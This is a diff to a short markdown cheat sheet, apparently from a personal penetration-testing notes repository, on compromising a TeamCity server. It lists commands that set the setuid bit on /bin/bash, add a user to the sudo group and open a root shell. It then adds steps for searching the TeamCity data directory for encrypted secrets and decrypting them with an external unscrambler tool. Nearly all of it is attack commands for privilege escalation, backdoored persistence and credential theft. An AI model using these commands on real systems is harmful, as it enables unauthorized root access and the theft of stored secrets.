H3llKa1ser/B00t2R00t/IaC Penetration Testing/Teamcity server compromise.md

 ## Commands to use:

- - chmod u+s /bin/bash
+ - 1) chmod u+s /bin/bash

- - usermod -aG sudo USER (Adds the user to sudo group)
+ - 2) usermod -aG sudo USER (Adds the user to sudo group)

 ### Then on our target machine if we have SSH access

- - sudo -s (Gain root shell)
+ - 2) sudo -s (Gain root shell)

+# Teamcity server secrets decryption

+### All TeamCity encrypted secrets start with zxx.

+### TeamCity secrets are stored within the data directory.

+### Command to find secrets within data directory

+ - grep -R zxx

+### Then decrypt with the tool: https://github.com/0xE2/teamcity-unscrambler/

+ - python3 unscrambler.py TEAMCITY_SECRET